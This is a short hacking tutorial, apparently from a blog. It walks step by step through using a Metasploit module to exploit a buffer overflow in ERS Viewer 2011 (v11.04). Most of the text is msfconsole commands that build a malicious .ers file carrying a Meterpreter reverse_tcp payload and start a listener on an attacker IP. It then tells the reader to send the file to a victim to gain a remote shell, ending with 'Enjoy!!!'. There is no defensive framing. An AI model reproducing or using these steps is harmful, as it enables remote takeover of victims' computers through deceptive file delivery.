Exploit Remote PC using ERS Viewer 2011 ERS File Handling Buffer Overflow
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll, where the function ERM_convert_to_correct_webpath handles user-provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
Exploit Targets
ERS Viewer 2011 (v11.04)
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open a Backtrack terminal and type msfconsole
Now type use exploit/windows/fileformat/erdas_er_viewer_bof
msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (erdas_er_viewer_bof)>exploit
After we successfully generate the malicious .ers file, it will be stored on your local computer at
/root/.msf4/local/msf.ers
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
exploit
Now send your msf.ers file to the victim. As soon as they download and open it, you can access a meterpreter shell on the victim computer.
Enjoy!!!